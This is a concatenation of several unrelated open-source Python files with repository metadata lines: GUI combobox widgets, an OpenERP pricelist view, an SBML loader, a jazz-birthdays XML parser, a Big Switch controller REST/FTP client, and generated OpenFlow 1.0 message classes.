        self.disconnect(self, SIGNAL("editTextChanged(QString)"), self.validate)
    def is_valid(self, qstr=None):
        """Return True if string is a syntactically valid URL."""
        if qstr is None:
            qstr = self.currentText()
        return QUrl(qstr).isValid()
def is_module_or_package(path):
    """Return True if *path* points to a Python module or package."""
    # A module is an existing file with a recognised Python extension.
    if osp.isfile(path) and osp.splitext(path)[1] in ('.py', '.pyw'):
        return True
    # A package is an existing directory that contains an __init__.py.
    return osp.isdir(path) and osp.isfile(osp.join(path, '__init__.py'))
class PythonModulesComboBox(PathComboBox):
    """
    QComboBox handling Python modules or packages path
    (i.e. .py, .pyw files *and* directories containing __init__.py)

    Selecting a valid entry emits the open(QString) signal.
    """
    def __init__(self, parent, adjust_to_contents=False):
        PathComboBox.__init__(self, parent, adjust_to_contents)
    def is_valid(self, qstr=None):
        """Return True if string names a Python module or package."""
        if qstr is None:
            qstr = self.currentText()
        return is_module_or_package(unicode(qstr))
    def selected(self):
        """Action to be executed when a valid item has been selected"""
        EditableComboBox.selected(self)
        self.emit(SIGNAL("open(QString)"), self.currentText())
| koll00/Gui_SM | SMlib/widgets/comboboxes.py | Python | mit | 8,133 |
# -*- coding: utf-8 -*-
"""
Created on 05 Apr 2014 3:30 AM
@author: <'Ronny Eichler'> ronny.eichler@gmail.com
UI
""" | wonkoderverstaendige/PyFL593FL | PyFL593FL/ui/__init__.py | Python | mit | 117 |
# -*- coding: utf-8 -*-
from openerp import tools
from openerp import models,fields,api
from openerp.tools.translate import _
class is_pricelist_item(models.Model):
    """Read-only model backed by the SQL view created in init().

    Flattens price list lines (product_pricelist_item) together with their
    version, price list and product attributes so they can be searched and
    browsed from a single place.

    Fix: removed a leftover Python-2 debug ``print`` statement and dead
    commented-out code from action_liste_items().
    """
    _name='is.pricelist.item'
    _order='pricelist_name,price_version_id,sequence,product_id'
    _auto = False  # no real table: backed by the SQL view below

    pricelist_name     = fields.Char('Liste de prix')
    pricelist_type     = fields.Char('Type')
    base               = fields.Integer('Base')
    price_version_id   = fields.Many2one('product.pricelist.version', 'Version')
    version_date_start = fields.Date('Date début version')
    version_date_end   = fields.Date('Date fin version')
    product_id         = fields.Many2one('product.product', 'Article')
    gestionnaire_id    = fields.Many2one('is.gestionnaire', 'Gestionnaire')
    ref_client         = fields.Char('Référence client')
    ref_fournisseur    = fields.Char('Référence fournisseur')
    moule              = fields.Char('Moule ou Dossier F')
    sequence           = fields.Integer('Sequence')
    product_uom_id     = fields.Many2one('product.uom', "Unité")
    product_po_uom_id  = fields.Many2one('product.uom', "Unité d'achat")
    min_quantity       = fields.Float('Quantité min.')
    price_surcharge    = fields.Float('Prix')
    item_date_start    = fields.Date('Date début ligne')
    item_date_end      = fields.Date('Date fin ligne')

    def init(self, cr):
        """(Re)create the SQL view exposing one row per price list line."""
        tools.drop_view_if_exists(cr, 'is_pricelist_item')
        cr.execute("""
            CREATE OR REPLACE view is_pricelist_item AS (
                SELECT
                    ppi.id as id,
                    pl.name as pricelist_name,
                    pl.type as pricelist_type,
                    ppi.base as base,
                    ppi.price_version_id as price_version_id,
                    ppv.date_start as version_date_start,
                    ppv.date_end as version_date_end,
                    ppi.product_id as product_id,
                    pt.is_gestionnaire_id as gestionnaire_id,
                    pt.is_ref_client as ref_client,
                    pt.is_ref_fournisseur as ref_fournisseur,
                    pt.is_mold_dossierf as moule,
                    ppi.sequence as sequence,
                    pt.uom_id as product_uom_id,
                    pt.uom_po_id as product_po_uom_id,
                    ppi.min_quantity as min_quantity,
                    ppi.price_surcharge as price_surcharge,
                    ppi.date_start as item_date_start,
                    ppi.date_end as item_date_end
                FROM product_pricelist_item ppi inner join product_product pp on ppi.product_id=pp.id
                    inner join product_template pt on pp.product_tmpl_id=pt.id
                    inner join product_pricelist_version ppv on ppi.price_version_id=ppv.id
                    inner join product_pricelist pl on ppv.pricelist_id = pl.id
                WHERE ppi.id>0
            )
        """)

    @api.multi
    def action_liste_items(self):
        """Open the raw price list lines of this row's version in the
        tree view matching the price list type (sale or purchase)."""
        for obj in self:
            if obj.price_version_id.pricelist_id.type=='sale':
                view_id=self.env.ref('is_plastigray.is_product_pricelist_item_sale_tree_view').id
                pricelist_type='sale'
            else:
                view_id=self.env.ref('is_plastigray.is_product_pricelist_item_purchase_tree_view').id
                pricelist_type='purchase'
            # Act on the first record only, as the original did.
            return {
                'name': str(obj.pricelist_name)+" ("+str(obj.price_version_id.name)+")",
                'view_mode': 'tree',
                'view_type': 'form',
                'res_model': 'product.pricelist.item',
                'type': 'ir.actions.act_window',
                'view_id' : False,
                'views' : [(view_id, 'tree')],
                'domain': [('price_version_id','=',obj.price_version_id.id)],
                'context': {
                    'default_price_version_id': obj.price_version_id.id,
                    'type': pricelist_type,
                }
            }

    @api.multi
    def corriger_anomalie_pricelist(self):
        """Repair the 'base' value of the underlying price list items:
        purchase price lists must use base=2, sale price lists base=1."""
        for obj in self:
            base=False
            if obj.pricelist_type=='purchase' and obj.base!=2:
                base=2
            if obj.pricelist_type=='sale' and obj.base!=1:
                base=1
            if base:
                # The view row id equals the product_pricelist_item id.
                items=self.env['product.pricelist.item'].browse(obj.id)
                for item in items:
                    item.base=base
| tonygalmiche/is_plastigray | report/is_pricelist_item.py | Python | mit | 5,365 |
import os
# Locate the SBML model file next to this module, independent of the
# current working directory.
path = os.path.dirname(os.path.realpath(__file__))
sbmlFilePath = os.path.join(path, 'MODEL0912503622.xml')
# Read the whole SBML document into memory at import time.
with open(sbmlFilePath,'r') as f:
    sbmlString = f.read()
def module_exists(module_name):
    """Return True when *module_name* can be imported, False otherwise."""
    try:
        __import__(module_name)
        return True
    except ImportError:
        return False
if module_exists('libsbml'):
import libsbml
sbml = libsbml.readSBMLFromString(sbmlString) | biomodels/MODEL0912503622 | MODEL0912503622/model.py | Python | cc0-1.0 | 427 |
# -*- coding:utf-8 -*-
import xml.etree.ElementTree as etree
import re
import datetime
# Output file for the successfully parsed ('good') records.
# Needs to be a structured format eventually - dump to tab-separated text for now.
#clean_output = 'clean_out.csv'
clean_output = 'clean.txt'
# Output file where lines that could not be parsed are dumped for review.
dirty_output = 'dirty_out.txt'
# open the clean output file
f2 = open(clean_output, 'w')
# open the dirty output file (original comment wrongly said 'clean')
f3 = open(dirty_output, 'w')
# Capitalised month names used by the main loop to recognise "day month" heading lines.
month_list = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August','September', 'October', 'November', 'December']
# Lower-case month names used by date_comp() when parsing death dates.
ref = ("january", "february", "march", "april", "may", "june", "july", "august", "september", "october", "november", "december")
# Module-level state: day/month parsed from the most recent heading line,
# read by muso_detail_split() and the main loop when building birth dates.
birth_day = 0
birth_month = 0
# Helper: the source data contains invisible characters (e.g. 132 and 160)
# that broke parsing, so strip everything outside the 7-bit ASCII range.
def remove_non_ascii_1(text):
    """Return *text* with every non-ASCII character removed."""
    kept = [ch for ch in text if ord(ch) < 128]
    return ''.join(kept)
#Second Function - test_line() - split the line into words and return how many there are
# (just used to spot 2-word lines which indicate a day / month heading line)
def test_line (text):
    """Return the number of whitespace-separated words in *text*."""
    words = text.split()
    num_words = len(words)
    #print "one " + str( words[0])
    #print "two " + str( words[1])
    return num_words
def muso_detail_split(text):
    """Parse a musician line 'First [Middle] Last, instr1, ..., birth_year'.

    Returns [forename, middlename, surname, birth_year(int), [instruments]],
    or [] when the last comma-field is not a plain year; unparseable lines
    are logged to the dirty file f3 (marked ***) together with the current
    module-level birth_day/birth_month.
    """
    # initialise so we can use it as a flag if fails below
    #worked = True
    #split the line of text using commas as a delimiter
    muso_bits = text.split(',')
    try: #try to convert the contents of the last item - to an integer. If it is 1928 or 1957 for example, it should work
        birth_year = int(muso_bits [-1])
        #Grab everything before the first comma - that seems to be a constant for the name location
        muso_name = muso_bits[0]
        #split that name into first, middle and surname to be returned individually - using the space as a delimiter
        # putting each into a list
        muso_name_list = muso_name.split(" ")
        muso_forname = muso_name_list[0] #choose the first item in the list - should be the forname
        muso_surname = muso_name_list[-1] # choose the last item as the last name
        #if there are more than 2 items in the list, assume that the second is a middle name
        if len (muso_name_list) > 2:
            muso_midname = muso_name_list[1]
        else:
            muso_midname = ""
        #chuck away the first item as we dealt with that as the names above
        muso_bits.remove(muso_bits[0])
        #chuck away the last item - it was the year of birth
        muso_bits.remove(muso_bits[-1])
        #we should be left with the instruments
        instrm_list = list(muso_bits)
        #keep these remaining items as a list of instruments / roles which we'll return as a list
        ############
        # TODO: needs to find and replace / in instrument list (e.g Campise entry)
        muso_obj = [muso_forname, muso_midname, muso_surname, birth_year, instrm_list]
    except ValueError:
        # doesn't end with a single year - can't process it for now: write it out to the dirty file (marked *** for future reference)
        f3.write(str(birth_day) + " " + str(birth_month) +"\n")
        f3.write(text + "*** " +"\n")
        # return empty list
        muso_obj = []
    return muso_obj
def create_date(d, m, y):
    """Build a datetime.date from day *d*, month *m* and year *y*."""
    return datetime.date(y, m, d)
def date_comp(dc):
    """Map a (possibly abbreviated) lower-case month name to its 1-based
    ordinal, e.g. 'jan' -> 1, 'december' -> 12.

    Matching is substring-based, mirroring the original lookup against the
    module-level ``ref`` tuple (so 'sept' matches 'september').  Returns
    None explicitly when nothing matches (the original fell off the end).
    """
    months = ("january", "february", "march", "april", "may", "june",
              "july", "august", "september", "october", "november",
              "december")
    for ordinal, month in enumerate(months, start=1):
        if dc in month:
            return ordinal
    return None
def find_death(line):
    """Parse a death-date fragment like 'Jan. 5, 1990' into 'YYYY-M-D'.

    The month name is normalised (dots stripped, lower-cased) and resolved
    via date_comp().  Raises ValueError when no year can be parsed: the
    original used a bare ``except: pass`` which left int_year unbound and
    crashed later with a NameError instead.
    """
    line = line.strip()
    list1 = line.split(',')
    try:
        # Second comma-field should be the year, e.g. ' 1990'.
        int_year = int(list1[1])
    except (IndexError, ValueError):
        raise ValueError("no parseable year in death date: %r" % line)
    # First field is '<month>. <day>'; turn dots into spaces before splitting.
    list1[0] = list1[0].replace(".", " ")
    d_m = list1[0].split(" ")
    d_m[0] = d_m[0].replace(".", "").lower()
    int_month = date_comp(d_m[0])
    int_day = d_m[-1]
    return str(int_year) + "-" + str(int_month) + "-" + str(int_day)
##################################
#      main code starts here     #
##################################
# grab the document as an xml object
tree = etree.parse('jazz_birthdays_manual_tidy.xml')
root = tree.getroot()
# Walk the <para> children: two-word lines set the current birth day/month,
# other lines are treated as musician entries parsed against that date.
for child in root:
    ignore_flag = False #used to identify elements with sub-elements <ulink> (ie Youtube links) as we don't want those
    dod =""
    for sub_child in child:
        if sub_child is not None:
            # if there is a sub-element (which can only be ulink)
            # set the flag to true and do nothing more with that line
            ignore_flag = True
    if not ignore_flag: #so no sub elements - so we need to do more checks
        if child.text is not None: #not an empty <para/>
            line_text = child.text.encode('utf-8') #encode the text
            line_text = line_text.strip() # strip leading and trailing whitespace
            line_text = remove_non_ascii_1(line_text) # clean out ascii chars 132 and 160 from some lines
            nw = test_line (line_text)
            if nw ==2:
                #it can only be a date (as only they have two elements - day / month)
                words = line_text.split()
                tally = 0
                if words[1] in month_list:
                    #take it that this is a date
                    # update the global variables with day and month *ordinal values*
                    # We can use these to build up a datetime object for each musician's birth
                    # (taking the year from the muso's line below)
                    birth_day = int(words [0])
                    birth_month = month_list.index(words[1]) +1
            else:
                #take it that it is a musician line (as we've excluded the day / month lines)
                # Lines with an alternative birth year "(or ..." go to the dirty file.
                find_substr = "(or"
                if find_substr in line_text:
                    f3.write(str(birth_day) + " " + str(birth_month) +"\n")
                    f3.write(line_text +"\n")
                else:
                    # we need to find death dates and split on those
                    # treating the second part as the death date
                    # and the first part as a general musician entry
                    death_text =""
                    deceased = re.search ("\(d\.(.*)\)", line_text)
                    # if "(d." found use that to split the string
                    if deceased:
                        split_dec = re.split ("\(d\.(.*)\)", line_text)
                        line_text = split_dec [0]
                        death_text = split_dec[1]
                    muso_parts = muso_detail_split (line_text)
                    # returned as muso_forname, muso_midname, muso_surname, birth_year, instrm_list
                    if len (muso_parts) > 0:
                        # Build the birth date from the current heading day/month
                        # plus this musician's year.
                        dob = create_date (birth_day, birth_month, muso_parts[3])
                        if deceased:
                            print death_text
                            dod = find_death (death_text)
                        # Tab-separated record: surname, forename, middle, dob, instruments, [dod]
                        f2.write (muso_parts[2] + "\t" + muso_parts[0] +"\t" + muso_parts [1] +"\t" + str(dob) + "\t")
                        for inst in muso_parts [4]:
                            f2.write (inst + ", ")
                        if dod != "":
                            f2.write(dod)
                        f2.write("\n")
f2.close()
f3.close() | watty62/jazz_birthdays | old versions/extraction4.py | Python | cc0-1.0 | 7,375 |
#
# Copyright (c) 2010,2011,2012,2013 Big Switch Networks, Inc.
#
# Licensed under the Eclipse Public License, Version 1.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at
#
# http://www.eclipse.org/legal/epl-v10.html
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
#
#
# module: storeclient.py
#
# This module manages communication with the console, i.e. the REST interface
# of a Big Switch Controller node.
import urllib
import urllib2
import ftplib
import json
import datetime
import time
import traceback
import url_cache
class StringReader():
    # Read-only file-like adapter used for ftp transfers in place of a real
    # file: wraps a plain string or a generator of string chunks and exposes
    # the read(size) interface that ftplib expects.
    def __init__(self, value):
        """
        Value can be a string, or a generator (iterator) yielding strings.
        """
        self.value = value
        self.offset = 0
        # ''.__class__ / u''.__class__ covers both str and unicode on
        # Python 2 while remaining valid on Python 3.
        self.is_string = isinstance(value, (''.__class__, u''.__class__))
        if self.is_string:
            self.len = len(value)
        else:
            # remainder of the last generator chunk not yet handed out
            self.last = None

    def read(self, size = None):
        """Return up to 'size' characters, or '' once the data is exhausted.
        With no 'size', return all remaining data (string mode) or the next
        whole chunk (generator mode)."""
        if self.is_string:
            if size is None or size > self.len - self.offset:
                size = self.len - self.offset
            # bug fix: original sliced value[offset:size], returning wrong
            # data as soon as offset > 0; slice [offset:offset+size] instead
            result = self.value[self.offset:self.offset + size]
            self.offset += size
            return result
        # supporting generators
        if self.last:  # serve the unconsumed remainder first
            if size is None or size > self.len - self.offset:
                size = self.len - self.offset
            result = self.last[self.offset:self.offset + size]
            self.offset += size
            if self.offset == self.len:
                self.last = None
            return result
        try:
            # bug fix: original read 'value.next()' (undefined name); use the
            # 2/3-compatible built-in next() on the wrapped iterator
            item = next(self.value)
        except StopIteration:
            return ''  # end of data, like a real file object
        if size is None or len(item) <= size:
            return item
        # keep the tail of the chunk for subsequent reads
        result = item[:size]
        self.last = item[size:]
        self.offset = 0
        self.len = len(self.last)
        return result
class StoreClient():
controller = None
display_rest = False
display_rest_reply = False
table_read_url = "http://%s/rest/v1/model/%s/"
entry_post_url = "http://%s/rest/v1/model/%s/"
user_data_url = "http://%s/rest/v1/data/"
sdn_platform_data_url = "http://%s/rest/v1/system/"
    def set_controller(self,controller):
        # Remember the "host:port" address used to build all REST URLs.
        self.controller = controller
    def display_mode(self, mode):
        # When True, echo every outgoing REST request to stdout.
        self.display_rest = mode
    def display_reply_mode(self, mode):
        # When True, also echo every REST reply to stdout.
        self.display_rest_reply = mode
def set_sdn_controller_platform_rest_if(self, sdn_controller_rest_if):
url = self.sdn_platform_data_url % (self.controller)
url = url + "restifaddr/"
data = self.rest_post_request(url, sdn_controller_rest_if)
def rest_simple_request(self,url, use_cache = None, timeout = None):
# include a trivial retry mechanism ... other specific
# urllib2 exception types may need to be included
retry_count = 0
if use_cache == None or use_cache:
result = url_cache.get_cached_url(url)
if result != None:
return result
while retry_count > 0:
try:
return urllib2.urlopen(url, timeout = timeout).read()
except urllib2.URLError:
retry_count -= 1
time.sleep(1)
# try again without the try...
if self.display_rest:
print "REST-SIMPLE:", 'GET', url
result = urllib2.urlopen(url, timeout = timeout).read()
if self.display_rest_reply:
print 'REST-SIMPLE: %s reply "%s"' % (url, result)
url_cache.save_url(url, result)
return result
def rest_json_request(self, url):
entries = url_cache.get_cached_url(url)
if entries != None:
return entries
result = self.rest_simple_request(url)
# XXX check result
entries = json.loads(result)
url_cache.save_url(url, entries)
return entries
    def rest_post_request(self, url, obj, verb='PUT'):
        """Send *obj* JSON-encoded to *url* using HTTP *verb* (default PUT)
        and return the raw reply body."""
        post_data = json.dumps(obj)
        if self.display_rest:
            print "REST-POST:", verb, url, post_data
        request = urllib2.Request(url, post_data, {'Content-Type':'application/json'})
        # urllib2 only knows GET/POST; override get_method to force the verb.
        request.get_method = lambda: verb
        response = urllib2.urlopen(request)
        result = response.read()
        if self.display_rest_reply:
            print 'REST-POST: %s reply: "%s"' % (url, result)
        return result
    def get_table_from_store(self, table_name, key=None, val=None, match=None):
        """Fetch rows of *table_name*, optionally filtered by
        key <match> val (match defaults to 'startswith').  Returns the
        JSON-decoded row list; results go through the URL cache."""
        if not self.controller:
            print "No controller specified. Set using 'controller <server:port>'."
            return
        url = self.table_read_url % (self.controller, table_name)
        if not match:
            match = "startswith"
        if key and val:
            url = "%s?%s__%s=%s" % (url, key, match, urllib.quote_plus(val))
        # Cache is keyed on the full (possibly filtered) URL.
        result = url_cache.get_cached_url(url)
        if result != None:
            return result
        data = self.rest_simple_request(url)
        entries = json.loads(data)
        url_cache.save_url(url, entries)
        return entries
    def get_object_from_store(self, table_name, pk_value):
        """Fetch the single *table_name* row with primary key *pk_value*.
        Returns the JSON-decoded object, or None on a non-200 reply;
        results go through the URL cache."""
        if not self.controller:
            print "No controller specified. Set using 'controller <server:port>'."
            return
        url = self.table_read_url % (self.controller, table_name)
        url += (pk_value + '/')
        result = url_cache.get_cached_url(url)
        if result != None:
            return result
        if self.display_rest:
            print "REST-MODEL:", url
        response = urllib2.urlopen(url)
        if response.code != 200:
            # LOOK! Should probably raise exception here instead.
            # In general we need to rethink the store interface and how
            # we should use exceptions.
            return None
        data = response.read()
        result = json.loads(data)
        if self.display_rest_reply:
            print 'REST-MODEL: %s reply: "%s"' % (url, result)
        url_cache.save_url(url, result)
        return result
    # obj_data must contain a key/val and any other required data
    def rest_create_object(self, obj_type, obj_data):
        """Create an *obj_type* instance from the *obj_data* dict.
        Returns the JSON-decoded error reply on failure, None on success.
        The URL cache is invalidated around the mutation."""
        if not self.controller:
            print "No controller specified. Set using 'controller <server:port>'."
            return
        url_cache.clear_cached_urls()
        url = self.entry_post_url % (self.controller, obj_type)
        data = self.rest_post_request(url, obj_data)
        # LOOK! successful stuff should be returned in json too.
        if data != "saved":
            result = json.loads(data)
            return result
        url_cache.clear_cached_urls()
def find_object_from_store(self, obj_type, key, val):
if not self.controller:
print "No controller specified. Set using 'controller <server:port>'."
return
url = self.table_read_url % (self.controller, obj_type)
result = url_cache.get_cached_url(url)
if result != None:
return result
data = self.rest_simple_request("%s?%s__exact=%s" % (url, key, urllib.quote_plus(val)))
entries = json.loads(data)
url_cache.save_url(url, entries)
return entries
    def rest_query_objects(self, obj_type, query_params=None):
        """Fetch *obj_type* rows matching the *query_params* dict (a value
        of None becomes an <id>__isnull=True filter).  Returns the
        JSON-decoded list; results go through the URL cache."""
        if not self.controller:
            print "No controller specified. Set using 'controller <server:port>'."
            return
        url = self.table_read_url % (self.controller, obj_type)
        if query_params:
            url += '?'
            # Convert any data:None fields to <id>__isnull=True
            non_null_query_params = dict([[n,v] if v != None else [n + '__isnull', True]
                                          for (n,v) in query_params.items()])
            url += urllib.urlencode(non_null_query_params)
        result = url_cache.get_cached_url(url)
        if result != None:
            return result
        data = self.rest_simple_request(url)
        entries = json.loads(data)
        url_cache.save_url(url, entries)
        return entries
    #
    # either must contain a key/val and any other required data
    # or the key must be a dictionary identifying the item to delete.
    def rest_delete_object(self, obj_type, key, val = None):
        """Delete *obj_type* instance(s), selected either by a key/val pair
        (sent as a URL query) or by a dict passed as *key* (sent as POST
        data).  Returns the JSON-decoded error reply on failure; on
        success returns None after clearing the URL cache."""
        dict_ = {}
        url = self.entry_post_url % (self.controller, obj_type)
        if val == None:
            if not type(key) == type(dict_):
                return None
            dict_ = key
        else:
            url += "?%s__exact=%s" % (key, urllib.quote_plus(val))
        # LOOK! I'm not sure this works the way it seems to me it's
        # designed to work. I think the intent is that you can specify
        # query parameters in the key argument which controls which
        # instance(s) should be deleted. But when I try it it seems to
        # always delete all instances, so it seems like the parameters
        # don't filter properly when passed via the POST data as opposed
        # to being specified as query parameters in the URL. The latter
        # way does work -- see rest_delete_objects that follows this.
        data = self.rest_post_request(url, dict_, 'DELETE')
        # LOOK! successful stuff should be returned in json too.
        if data != "deleted":
            dict_ = json.loads(data)
            return dict_
        url_cache.clear_cached_urls()
    def rest_delete_objects(self, obj_type, query_params):
        """Delete all *obj_type* rows matching *query_params* (a value of
        None becomes an <id>__isnull=True filter).  Returns the
        JSON-decoded error reply on failure; on success returns None
        after clearing the URL cache."""
        url = self.entry_post_url % (self.controller, obj_type)
        if query_params:
            url += '?'
            # Convert any data:None fields to <id>__isnull=True
            non_null_query_params = dict([[n,v] if v != None else [n + '__isnull', True]
                                          for (n,v) in query_params.items()])
            url += urllib.urlencode(non_null_query_params)
        data = self.rest_post_request(url, {}, 'DELETE')
        # LOOK! successful stuff should be returned in json too.
        if data != "deleted":
            result = json.loads(data)
            return result
        url_cache.clear_cached_urls()
    def rest_update_object(self, obj_type, obj_key_name, obj_key_val, obj_data):
        """Update the *obj_type* instance selected by obj_key_name=obj_key_val
        with the fields in *obj_data*.  Returns the JSON-decoded reply on
        failure; on success returns None after clearing the URL cache."""
        if not self.controller:
            print "No controller specified. Set using 'controller <server:port>'."
            return
        url = self.entry_post_url % (self.controller, obj_type)
        url += "?%s=%s" % (obj_key_name, urllib.quote_plus(obj_key_val)) # add a query string
        data = self.rest_post_request(url, obj_data)
        # LOOK! successful stuff should be returned in json too.
        result = json.loads(data)
        if result.get('description', '') != "saved":
            return result
        url_cache.clear_cached_urls()
def set_user_data_file(self, name, text):
url = self.user_data_url % (self.controller)
version = 1 # default
# find the latest version for a name
existing_data = self.get_user_data_table(name, "latest")
if len(existing_data) > 0: # should be at most 1, but just in case...
version = max([int(f['version']) for f in existing_data]) + 1 # LOOK! race?
length = len(text)
# LOOK! what to do about time in a distributed system!
timestamp = datetime.datetime.utcnow().strftime("%Y-%m-%d.%H:%M:%S")
url += "%s/timestamp=%s/version=%s/length=%s/" % (name, timestamp, version, length)
return self.copy_text_to_url(url, text)
def get_user_data_file(self, name):
url = self.user_data_url % (self.controller)
url += name + "/"
return self.rest_simple_request(url)
def delete_user_data_file(self, name):
url = self.user_data_url % (self.controller)
url += name + "/"
data = self.rest_post_request(url, {}, 'DELETE')
if data != "deleted":
result = json.loads(data)
return result
    def get_user_data_table(self, name=None, show_version="latest"):
        """
        List stored user data files as dicts.

        Each stored key looks like
        "startup/timestamp=2010-11-03.05:51:27/version=1/length=2038";
        it is parsed into a dict with keys 'name', 'full_name',
        'timestamp', 'version' and 'length' (all values are strings).

        name, if given, restricts results to files whose name starts with
        it.  show_version selects "latest" (only the highest version per
        name), "all", or an exact version string to match.

        Returns the list of dicts, or None when no controller is set.
        """
        if not self.controller:
            print "No controller specified. Set using 'controller <server:port>'."
            return None
        url = self.user_data_url % self.controller
        if name:
            url += "?name__startswith=%s" % name
        data = self.rest_simple_request(url)
        new_data = []
        data = json.loads(data)
        latest_versions = {} # dict of latest version per name
        for d in data: # list of dicts
            l = d['name'].split('/') # ex: startup/timestamp=2010-11-03.05:51:27/version=1/length=2038
            # The key=value path components become dict entries.
            nd = dict([item.split('=') for item in l[1:]])
            nd['name'] = l[0]
            nd['full_name'] = d['name']
            new_data.append(nd)
            # Track the numerically-highest version seen per name
            # (versions are kept as strings, so compare as ints).
            if not nd['name'] in latest_versions or int(nd['version']) > int(latest_versions[nd['name']]):
                latest_versions[nd['name']] = nd['version'] # initialize first time
        # prune if needed to a name or a particular version
        if name:
            new_data = [ nd for nd in new_data if nd['name'].startswith(name) ]
        if show_version == "latest":
            new_data = [ nd for nd in new_data if not int(nd['version']) < int(latest_versions[nd['name']]) ]
        elif show_version != "all":
            # NOTE: string comparison -- show_version must be passed as a string.
            new_data = [ nd for nd in new_data if nd['version'] == show_version ]
        return new_data
# LOOK! looks a lot like a rest_post_request except we don't jsonify and we handle
# errors differently... refactor? Same with get_text and rest_simple_request
def copy_text_to_url(self, url, src_text, message = None):
post_data = src_text
if url.startswith('ftp://'):
url_suffix = url[6:]
user = 'anonymous'
password = ''
if url_suffix.find('@') != -1:
url_parts = url_suffix.split('@')
url_user_and_password = url_parts[0]
url_suffix = url_parts[1]
if url_user_and_password.find(':') != -1:
user_and_password = url_user_and_password.split(':')
user = user_and_password[0]
password = user_and_password[1]
else:
user = url_user_and_password
host = url_suffix
path = None
if url_suffix.find('/'):
url_suffix_parts = url_suffix.split('/')
host = url_suffix_parts[0]
path = url_suffix_parts[1]
ftp_target = ftplib.FTP(host, user, password)
ftp_target.storbinary('STOR %s' % path, StringReader(post_data))
# apparently, storbinary doesn't provide a return value
result = { "result" : "success" } # don't display any other error messages
else:
request = urllib2.Request(url, post_data, {'Content-Type':'text/plain'})
request.get_method = lambda: 'PUT'
if self.display_rest:
print "REST-TEXT-TO:", request
response = urllib2.urlopen(request)
result = response.read()
if self.display_rest_reply:
print 'REST-TEXT-TO: %s reply "%s"' % (request, result)
return result
def get_text_from_url(self, url):
if self.display_rest:
print "REST-TEXT-FROM:", url
result = urllib2.urlopen(url).read()
if self.display_rest_reply:
print 'REST-TEXT-FROM: %s result:"%s"' % (url, result)
return result
| opennetworkinglab/spring-open-cli | cli/storeclient.py | Python | epl-1.0 | 15,736 |
#!/usr/bin/python
#coding:utf-8
# Demo module (Python 2): every top-level statement below runs exactly once,
# the first time this module is imported, so the two prints bracket the work
# the import performs.
print 'start to load...'
import sys
# Module attributes created at import time:
name = 42
def func(): pass
class kclass : pass
print 'done loading.' | gensmusic/test | l/python/book/learning-python/c22/module3.py | Python | gpl-2.0 | 137 |
# Copyright (c) 2008 The Board of Trustees of The Leland Stanford Junior University
# Copyright (c) 2011, 2012 Open Networking Foundation
# Copyright (c) 2012, 2013 Big Switch Networks, Inc.
# See the file LICENSE.pyloxi which should have been included in the source distribution
# Automatically generated by LOXI from template module.py
# Do not modify
import struct
import loxi
import util
import loxi.generic_util
import sys
ofp = sys.modules['loxi.of10']
class message(loxi.OFObject):
    """Base class for OpenFlow 1.0 messages (generated by LOXI -- do not edit).
    Wire header: version(1B) type(1B) length(2B) xid(4B), big-endian.
    Concrete message types register themselves in 'subtypes' keyed on the
    header type byte; unpack() dispatches through that table."""
    subtypes = {}
    version = 1
    def __init__(self, type=None, xid=None):
        if type != None:
            self.type = type
        else:
            self.type = 0
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        return
    def pack(self):
        """Serialize to a wire-format string; the length field is patched in
        after all parts are packed."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize from reader, dispatching to a registered subtype when
        the type byte matches one."""
        subtype, = reader.peek('B', 1)
        subclass = message.subtypes.get(subtype)
        if subclass:
            return subclass.unpack(reader)
        obj = message()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        obj.type = reader.read("!B")[0]
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4) # bound reads to this message
        obj.xid = reader.read("!L")[0]
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.type != other.type: return False
        if self.xid != other.xid: return False
        return True
    def pretty_print(self, q):
        """Render a human-readable form through pretty-printer q."""
        q.text("message {")
        with q.group():
            with q.indent(2):
                q.breakable()
                q.text("xid = ");
                if self.xid != None:
                    q.text("%#x" % self.xid)
                else:
                    q.text('None')
            q.breakable()
        q.text('}')
class stats_reply(message):
    """OpenFlow 1.0 stats reply (header type 17).  Carries a stats_type
    selector and flags; concrete replies register in 'subtypes' keyed on
    stats_type.  Generated by LOXI -- do not edit."""
    subtypes = {}
    version = 1
    type = 17
    def __init__(self, xid=None, stats_type=None, flags=None):
        if xid != None:
            self.xid = xid
        else:
            self.xid = None
        if stats_type != None:
            self.stats_type = stats_type
        else:
            self.stats_type = 0
        if flags != None:
            self.flags = flags
        else:
            self.flags = 0
        return
    def pack(self):
        """Serialize to wire format; length is patched in afterwards."""
        packed = []
        packed.append(struct.pack("!B", self.version))
        packed.append(struct.pack("!B", self.type))
        packed.append(struct.pack("!H", 0)) # placeholder for length at index 2
        packed.append(struct.pack("!L", self.xid))
        packed.append(struct.pack("!H", self.stats_type))
        packed.append(struct.pack("!H", self.flags))
        length = sum([len(x) for x in packed])
        packed[2] = struct.pack("!H", length)
        return ''.join(packed)
    @staticmethod
    def unpack(reader):
        """Deserialize, dispatching on the stats_type field at offset 8."""
        subtype, = reader.peek('!H', 8)
        subclass = stats_reply.subtypes.get(subtype)
        if subclass:
            return subclass.unpack(reader)
        obj = stats_reply()
        _version = reader.read("!B")[0]
        assert(_version == 1)
        _type = reader.read("!B")[0]
        assert(_type == 17)
        _length = reader.read("!H")[0]
        orig_reader = reader
        reader = orig_reader.slice(_length, 4)
        obj.xid = reader.read("!L")[0]
        obj.stats_type = reader.read("!H")[0]
        obj.flags = reader.read("!H")[0]
        return obj
    def __eq__(self, other):
        if type(self) != type(other): return False
        if self.xid != other.xid: return False
        if self.stats_type != other.stats_type: return False
        if self.flags != other.flags: return False
        return True
    def pretty_print(self, q):
        """Render a human-readable form through pretty-printer q."""
        q.text("stats_reply {")
        with q.group():
            with q.indent(2):
                q.breakable()
